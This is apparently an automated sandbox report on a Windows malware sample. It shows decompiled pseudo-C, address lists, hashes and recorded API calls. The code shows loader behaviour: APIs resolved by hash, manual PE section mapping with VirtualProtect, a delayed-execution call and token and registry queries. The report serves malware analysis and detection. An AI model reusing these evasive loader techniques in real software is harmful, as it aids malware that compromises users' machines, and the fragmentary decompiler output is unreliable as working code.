									E6EB30FD4(_t403, _t413, _t403);
								}
								E6EB2F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6EB2BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6EB2BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6eb3073f
0x6eb30741
0x6eb30748
0x6eb30fc7
0x6eb30fcd
0x6eb30fcd
0x6eb30752
0x6eb3075e
0x6eb3076a
0x6eb3076f
0x6eb3077c
0x6eb3078d
0x6eb3078f
0x6eb30790
0x6eb30791
0x6eb30791
0x6eb30792
0x6eb30796
0x6eb3079a
0x6eb3079f
0x6eb307a2
0x6eb307a8
0x6eb307c2
0x6eb307c9
0x6eb307cc
0x6eb307cf
0x6eb307d1
0x6eb307dd
0x6eb307ea
0x6eb307f7
0x6eb307fb
0x6eb30887
0x6eb30887
0x6eb30889
0x6eb3088d
0x6eb30898
0x6eb308ae
0x6eb308b1
0x6eb308b1
0x6eb308b5
0x6eb308be
0x6eb308c3
0x6eb308c3
0x6eb308c5
0x6eb308d6
0x6eb308f8
0x6eb308fa
0x6eb308fb
0x6eb308ff
0x6eb308ff
0x6eb30908
0x6eb30914
0x6eb3091d
0x6eb30933
0x6eb30943
0x6eb30948
0x6eb3094c
0x6eb30951
0x6eb30953
0x6eb309a3
0x6eb309b8
0x6eb309bc
0x6eb309c1
0x6eb309d2
0x6eb309e7
0x6eb309eb
0x6eb309f0
0x6eb309f2
0x6eb30a39
0x6eb30a3c
0x6eb30a8a
0x6eb30a8d
0x6eb30ace
0x6eb30ad2
0x6eb30ad7
0x6eb30adc
0x6eb30afb
0x6eb30afb
0x6eb30afb
0x6eb30afd
0x00000000
0x6eb30afd
0x6eb30ade
0x6eb30ae2
0x6eb30ae4
0x6eb30aeb
0x6eb30aeb
0x6eb30af1
0x6eb30af1
0x6eb30af3
0x6eb30af6
0x6eb30af6
0x00000000
0x6eb30af3
0x6eb30ae6
0x6eb30ae9
0x6eb30aef
0x6eb30aef
0x00000000
0x6eb30aef
0x00000000
0x6eb30ae9
0x6eb30a8f
0x6eb30a92
0x00000000
0x00000000
0x6eb30a98
0x6eb30a9d
0x6eb30aa2
0x6eb30ac1
0x6eb30ac1
0x6eb30acb
0x00000000
0x6eb30acb
0x6eb30aa4
0x6eb30aa8
0x6eb30aaa
0x6eb30ab1
0x6eb30ab1
0x6eb30ab7
0x6eb30ab7
0x6eb30ab9
0x6eb30abc
0x6eb30abc
0x00000000
0x6eb30ab9
0x6eb30aac
0x6eb30aaf
0x6eb30ab5
0x6eb30ab5
0x00000000
0x6eb30ab5
0x00000000
0x6eb30aaf
0x6eb30a3e
0x6eb30a40
0x6eb30a7f
0x6eb30a82
0x6eb30df4
0x6eb30df9
0x6eb30dfe
0x6eb30e1d
0x6eb30e1d
0x6eb30e27
0x00000000
0x6eb30e27
0x6eb30e00
0x6eb30e04
0x6eb30e06
0x6eb30e0d
0x6eb30e0d
0x6eb30e13
0x6eb30e13
0x6eb30e15
0x6eb30e18
0x6eb30e18
0x00000000
0x6eb30e15
0x6eb30e08
0x6eb30e0b
0x6eb30e11
0x6eb30e11
0x00000000
0x6eb30e11
0x00000000
0x6eb30e0b
0x00000000
0x6eb30a88
0x6eb30a46
0x6eb30a4b
0x6eb30a50
0x6eb30a6f
0x6eb30a6f
0x6eb30a79
0x00000000
0x6eb30a79
0x6eb30a52
0x6eb30a56
0x6eb30a58
0x6eb30a5f
0x6eb30a5f
0x6eb30a65
0x6eb30a65
0x6eb30a67
0x6eb30a6a
0x6eb30a6a
0x00000000
0x6eb30a67
0x6eb30a5a
0x6eb30a5d
0x6eb30a63
0x6eb30a63
0x00000000
0x6eb30a63
0x00000000
0x6eb30a5d
0x6eb309f4
0x6eb309f6
0x00000000
0x00000000
0x6eb30a00
0x6eb30a05
0x6eb30a0a
0x6eb30a29
0x6eb30a29
0x6eb30a33
0x00000000
0x6eb30a33
0x6eb30a0c
0x6eb30a10
0x6eb30a12
0x6eb30a19
0x6eb30a19
0x6eb30a1f
0x6eb30a1f
0x6eb30a21
0x6eb30a24
0x6eb30a24
0x00000000
0x6eb30a21
0x6eb30a14
0x6eb30a17
0x6eb30a1d
0x6eb30a1d
0x00000000
0x6eb30a1d
0x00000000
0x6eb30a17
0x6eb30959
0x6eb3095e
0x6eb30963
0x6eb30982
0x6eb30982
0x6eb3098c
0x00000000
0x6eb3098c
0x6eb30965
0x6eb30969
0x6eb3096b
0x6eb30972
0x6eb30972
0x6eb30978
0x6eb30978
0x6eb3097a
0x6eb3097d
0x6eb3097d
0x00000000
0x6eb3097a
0x6eb3096d
0x6eb30970
0x6eb30976
0x6eb30976
0x00000000
0x6eb30976
0x00000000
0x6eb3089a
0x6eb3089c
0x6eb30b01
0x6eb30b06
0x6eb30b09
0x6eb30b0e
0x6eb30b10
0x6eb30b25
0x6eb30b28
0x6eb30bf6
0x6eb30bfe
0x6eb30c01
0x6eb30c16
0x6eb30c20
0x6eb30c20
0x6eb30c22
0x6eb30c24
0x6eb30c33
0x6eb30c3f
0x6eb30c43
0x6eb30c46
0x6eb30c49
0x6eb30c4c
0x00000000
0x6eb30c4c
0x6eb30b38
0x6eb30b4a
0x6eb30b4e
0x6eb30bda
0x6eb30bda
0x6eb30be0
0x6eb30beb
0x6eb30be2
0x6eb30be2
0x6eb30be2
0x00000000
0x6eb30be0
0x6eb30b5b
0x6eb30b5c
0x6eb30b5e
0x6eb30b64
0x6eb30fb3
0x6eb30fb8
0x6eb30fba
0x00000000
0x00000000
0x6eb30fc0
0x6eb30b7b
0x6eb30b7f
0x6eb30b84
0x6eb30b96
0x6eb30b9a
0x6eb30ba5
0x6eb30ba6
0x6eb30ba7
0x6eb30ba8
0x6eb30baa
0x6eb30bb5
0x6eb30e2d
0x6eb30e2d
0x6eb30bb5
0x6eb30bbb
0x6eb30bc4
0x6eb30e3f
0x6eb30e55
0x6eb30e57
0x6eb30e59
0x6eb30f94
0x6eb30f9b
0x00000000
0x6eb30f9b
0x6eb30e68
0x6eb30e76
0x6eb30e90
0x6eb30e92
0x6eb30e94
0x6eb30fa5
0x6eb30faa
0x6eb30fac
0x00000000
0x00000000
0x6eb30fae
0x6eb30ea8
0x6eb30eb3
0x6eb30ec2
0x6eb30ed4
0x6eb30ed6
0x6eb30ed8
0x6eb30ee5
0x6eb30ee5
0x6eb30ef5
0x6eb30f06
0x6eb30f0b
0x6eb30f0d
0x6eb30f0f
0x6eb30f16
0x6eb30f17
0x6eb30f17
0x6eb30f23
0x6eb30f44
0x6eb30f4d
0x6eb30f59
0x6eb30f65
0x6eb30f6a
0x6eb30f6f
0x6eb30f75
0x6eb30f75
0x6eb30f7a
0x6eb30f80
0x00000000
0x6eb30f86
0x6eb30f88
0x00000000
0x6eb30f88
0x6eb30bca
0x6eb30bca
0x6eb30bcf
0x6eb30bd5
0x6eb30bd5
0x00000000
0x6eb30bcf
0x6eb30bc4
0x6eb30898
0x6eb30808
0x6eb30809
0x6eb3080b
0x6eb30811
0x6eb30dde
0x6eb30de3
0x6eb30de5
0x00000000
0x00000000
0x6eb30deb
0x6eb30828
0x6eb3082c
0x6eb30831
0x6eb30847
0x6eb3085e
0x6eb30862
0x6eb30c5a
0x6eb30c5a
0x6eb30862
0x6eb30868
0x6eb30871
0x6eb30c69
0x6eb30c7a
0x6eb30c7f
0x6eb30c81
0x6eb30c83
0x6eb30db4
0x6eb30db8
0x00000000
0x6eb30db8
0x6eb30c8f
0x6eb30cb4
0x6eb30cb6
0x6eb30cb8
0x6eb30dd0
0x6eb30dd5
0x6eb30dd7
0x00000000
0x00000000
0x6eb30dd9
0x6eb30cc9
0x6eb30cd7
0x6eb30cde
0x6eb30cdf
0x6eb30ce0
0x6eb30cf2
0x6eb30cf4
0x6eb30cf6
0x00000000
0x00000000
0x6eb30cfe
0x6eb30d19
0x6eb30d1b
0x6eb30d1d
0x6eb30dc2
0x6eb30dc7
0x6eb30dc9
0x00000000
0x00000000
0x6eb30dcb
0x6eb30d23
0x6eb30d2a
0x6eb30d2e
0x6eb30d99
0x6eb30d99
0x6eb30d9b
0x6eb30da2
0x6eb30da2
0x6eb30da8
0x6eb30da8
0x6eb30daa
0x6eb30daf
0x6eb30daf
0x00000000
0x6eb30daa
0x6eb30d9d
0x6eb30da0
0x6eb30da6
0x6eb30da6
0x00000000
0x6eb30da6
0x00000000
0x6eb30da0
0x6eb30d30
0x6eb30d30
0x6eb30d32
0x6eb30d3e
0x6eb30d43
0x6eb30d45
0x00000000
0x00000000
0x6eb30d47
0x6eb30d4b
0x6eb30d52
0x6eb30d53
0x6eb30d54
0x6eb30d56
0x00000000
0x00000000
0x6eb30d58
0x6eb30d5a
0x6eb30d61
0x6eb30d61
0x6eb30d67
0x6eb30d67
0x6eb30d69
0x6eb30d6e
0x6eb30d6e
0x6eb30d77
0x6eb30d7c
0x6eb30d81
0x6eb30d87
0x6eb30d87
0x6eb30d8c
0x00000000
0x6eb30d8c
0x6eb30d5c
0x6eb30d5f
0x6eb30d65
0x6eb30d65
0x00000000
0x6eb30d65
0x00000000
0x6eb30d93
0x6eb30d93
0x6eb30d94
0x6eb30d94
0x00000000
0x6eb30d32
0x6eb30877
0x6eb3087c
0x6eb30882
0x6eb30882
0x00000000
0x6eb30c59
0x6eb30c59
0x6eb30c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6EB3085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6EB30C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6EB30CB4

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 444907c4ad72c79e3939cd8596e029ff9ff2e7b647fe0047f8b35e594633a4cb
Instruction ID: eb38a80d3d1139546fbb0c75ed9491297b4356b9047bef3473490d9f3e4b84b4
Opcode Fuzzy Hash: 444907c4ad72c79e3939cd8596e029ff9ff2e7b647fe0047f8b35e594633a4cb
Instruction Fuzzy Hash: 9A22D6706183E1AEE751DBA8D852BEF7FA9EF81304F20492DE89857194FB31D805C752

Uniqueness

Uniqueness Score: -1.00%

Function 6EB32234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6EB32234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6EB33AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6EB3306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6eb32234
0x6eb32238
0x6eb32254
0x6eb32257
0x6eb3223a
0x6eb32249
0x6eb3224c
0x6eb3224c
0x6eb32267
0x6eb3226c
0x6eb32270
0x6eb32278
0x6eb32278
0x6eb3227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6EB24B17,00000000,00000000,?), ref: 6EB32278

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 93f98d931aa20154ad29283d5cd22ef5dac1902d69cc76de6f4d473ebe1a60db
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: C2E065B050E352ADE754966C9C06B6F7AD8EF84711F30892CB468D7184E670944187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6EB32820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB32820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6EB3306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6eb32827
0x6eb32830
0x6eb3283e
0x6eb32861
0x6eb32861
0x6eb32840
0x6eb32857
0x6eb3285b
0x00000000
0x6eb3285d
0x6eb3285d
0x6eb3285d
0x6eb3285b
0x6eb32866

APIs

NtAllocateVirtualMemory.NTDLL(6EB388E6,?,00000000,000000FF,6EB388E6,6EB388E6,60A28C5C,60A28C5C,?,?,6EB388E6,00003000,00000004,000000FF), ref: 6EB32857

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: f0c6281755f24fcc4ed19730fa66b441383adc99a8fec3feee546c44cfb15b2c
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: BCE03971209392BFEB09CA99CD25E6FBBE9EF84A04F208C2DB594C6650D730D8009761

Uniqueness

Uniqueness Score: -1.00%

Function 6EB33138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EB33138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6EB334B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6eb33138
0x6eb3313d
0x6eb3313f
0x6eb33141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6EB334B0,6EB33128,60A28C5C,60A28C5C,?,6EB26C99,00000000), ref: 6EB3313F

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 1ea5e9b385d677caf7e5765473a3bce0007147e2345313ce406b8d3fc6075d17
Instruction ID: ee0930a0d60a3c8131c7edc452f016f9517f8998784e17e10c29261c95853e6b
Opcode Fuzzy Hash: 1ea5e9b385d677caf7e5765473a3bce0007147e2345313ce406b8d3fc6075d17
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0076141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0076141B(long __ebx, void* __edi, long __esi, intOrPtr* _a4, intOrPtr _a814471233) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t141;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				intOrPtr _t186;
				unsigned int _t203;
				void* _t236;
				intOrPtr _t239;
				intOrPtr _t244;
				void* _t246;
				intOrPtr* _t250;
				intOrPtr _t258;
				DWORD* _t270;
				void* _t274;
				intOrPtr* _t277;
				intOrPtr* _t278;

				_t141 = _a4;
				_v20 = 0;
				_t246 =  *((intOrPtr*)(_t141 + 0x6c));
				 *0x764418 = 1;
				asm("movaps xmm0, [0x763010]");
				asm("movups [0x764428], xmm0");
				_v48 = _t141;
				_v52 =  *((intOrPtr*)(_t141 + 0x1c));
				_v56 =  *((intOrPtr*)(_v48 + 0x54));
				_v188 = _t246;
				_v184 =  *((intOrPtr*)(_t141 + 0x38));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t246;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __esi, __ebx, _t270); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x38));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00761E1E();
				E007622BF(_v68,  *((intOrPtr*)(_v48 + 0x3c)), _v56);
				E00761E1E( *((intOrPtr*)(_v48 + 0x3c)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t277 = _t274 - 0x8c;
				_t236 = _v68;
				_t258 =  *((intOrPtr*)(_t236 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t236;
				_v108 = _t258;
				if(_t258 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v60 != 0) {
					_v136 = 0;
					_v132 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_t203 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t203 >> 0x0000001e & 0x00000001;
						_v148 = _t203 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t174 + 0xc));
						_v184 =  *((intOrPtr*)(_v140 + 8));
						_v180 =  *((intOrPtr*)(0x764418 + (_v144 << 4) + (_v148 << 3) + ((_t203 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v136;
						_t186 =  *_v52();
						_t277 = _t277 - 0x10;
						_t244 = _v152 + 1;
						_v156 = _t186;
						_v136 = _t244;
						_v132 = _v140 + 0x28;
						if(_t244 == _v60) {
							goto L5;
						}
						_a814471233 = _a814471233 - 1;
					}
				}
				L5:
				 *_t277 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x48));
				_t159 = DisableThreadLibraryCalls(??);
				_t278 = _t277 - 4;
				_t239 =  *_v100;
				_v120 = _t159;
				_v124 = _t239;
				_v128 = _v68;
				if(_t239 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t250 = _v48;
				_v44 =  *((intOrPtr*)(_t250 + 0x5c));
				_v40 =  *((intOrPtr*)(_t250 + 0x60));
				_v36 =  *((intOrPtr*)(_t250 + 0x64));
				_v32 =  *_t250;
				_v28 =  *((intOrPtr*)(_t250 + 0x24));
				_v24 = _v116;
				 *_t278 = _t250;
				_v188 = 0;
				_v184 = 0x70;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x70;
				_v172 =  *((intOrPtr*)(_v128 + 0x28));
				E00761E1E();
				if(_v172 != 0) {
					_t277 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00761427
0x00761435
0x0076143c
0x0076143f
0x00761449
0x00761450
0x0076145a
0x00761460
0x00761469
0x00761472
0x00761475
0x00761479
0x00761481
0x00761488
0x0076148b
0x0076148e
0x00761491
0x00761494
0x007614ae
0x007614b4
0x007614b7
0x007614bf
0x007614c3
0x007614c6
0x007614c9
0x007614cc
0x007614cf
0x007614eb
0x00761508
0x0076152d
0x0076152f
0x00761538
0x0076153b
0x00761545
0x00761548
0x0076154b
0x0076154e
0x00761551
0x00761568
0x00761568
0x00761574
0x00761577
0x0076174d
0x00761753
0x007615f2
0x007615f2
0x0076160a
0x0076160d
0x0076161b
0x0076162c
0x00761658
0x0076165b
0x0076165f
0x00761663
0x0076166a
0x00761670
0x00761672
0x00761684
0x0076168c
0x00761692
0x00761698
0x0076169b
0x00000000
0x00000000
0x007616a5
0x007616a5
0x007615f2
0x00761599
0x007615a7
0x007615af
0x007615b2
0x007615b4
0x007615ba
0x007615c6
0x007615c9
0x007615cc
0x007615cf
0x007615ea
0x007615ea
0x007616d5
0x007616db
0x007616e1
0x007616e7
0x007616ec
0x007616f2
0x007616f8
0x007616fb
0x007616fe
0x00761706
0x0076170e
0x00761714
0x0076171a
0x00761720
0x00761726
0x00761734
0x0076158c
0x00761592
0x00761592
0x007616bf

APIs

VirtualProtect.KERNELBASE ref: 00761494
VirtualProtect.KERNELBASE ref: 0076152D

Strings

p, xrefs: 00761706

Memory Dump Source

Source File: 00000000.00000002.686308627.0000000000760000.00000040.00000001.sdmp, Offset: 00760000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: p
API String ID: 544645111-2181537457
Opcode ID: e18cd36f7a889d53622f99eab8ec00f76f1dc0c39d8576ab15d9ca4e4a7a8b5c
Instruction ID: a0918b3d02f946806d1ab039e301501007ce567d6fe0bfffed63b1d6215cabb8
Opcode Fuzzy Hash: e18cd36f7a889d53622f99eab8ec00f76f1dc0c39d8576ab15d9ca4e4a7a8b5c
Instruction Fuzzy Hash: FC819AB4E043188FCB14CF99C884AADFBF1BF88304F65856AE959AB351D734A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6EB310A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6EB310A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6EB3306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6EB2C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6EB2BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6EB2F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6EB2F4BC(_t59, 0);
					_t34 = E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6eb310b3
0x6eb310b5
0x6eb310c4
0x6eb310c8
0x6eb310d2
0x6eb310d2
0x6eb310d8
0x6eb310db
0x6eb310dd
0x6eb310e8
0x6eb31122
0x6eb31127
0x6eb3112c
0x6eb3112c
0x00000000
0x6eb31131
0x6eb310f4
0x6eb31107
0x6eb31118
0x6eb31118
0x6eb3111a
0x6eb31120
0x6eb3113e
0x6eb31145
0x6eb3114e
0x6eb3115c
0x6eb31165
0x6eb31168
0x6eb3116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EB31118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EB3117B

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 7beb35365bcee9b1c07dafc480c15a9fba7877c0ca701b2db1cf3c06651747d7
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 6541D5702842E36EE765D5E89C61BAF7EDCDF85304F388838A960D6194DF24C84AC751

Uniqueness

Uniqueness Score: -1.00%

Function 6EB357B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EB357B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6EB33064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6EB2F828(_a8, _t15);
							if(E6EB33064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6EB2F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6eb357b8
0x6eb357b9
0x6eb357bb
0x6eb357c0
0x6eb357c7
0x6eb357cb
0x6eb357cb
0x6eb357cb
0x6eb357cf
0x6eb35815
0x6eb35815
0x6eb357d1
0x6eb357d1
0x6eb357d7
0x6eb357e0
0x6eb357e3
0x6eb357fa
0x6eb3580b
0x6eb3580b
0x6eb3580d
0x6eb35813
0x6eb3581e
0x6eb35836
0x6eb35856
0x6eb35856
0x6eb35858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb357d7
0x6eb35860

APIs

RegQueryValueExA.KERNELBASE(?,6EB3D1F8,00000000,?,00000000,00000000,?,?,?,6EB3D1F8,?,6EB35887,?,00000000,00000000), ref: 6EB3580B
RegQueryValueExA.KERNELBASE(?,6EB3D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6EB3D1F8,?,6EB35887,?,00000000), ref: 6EB35856

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

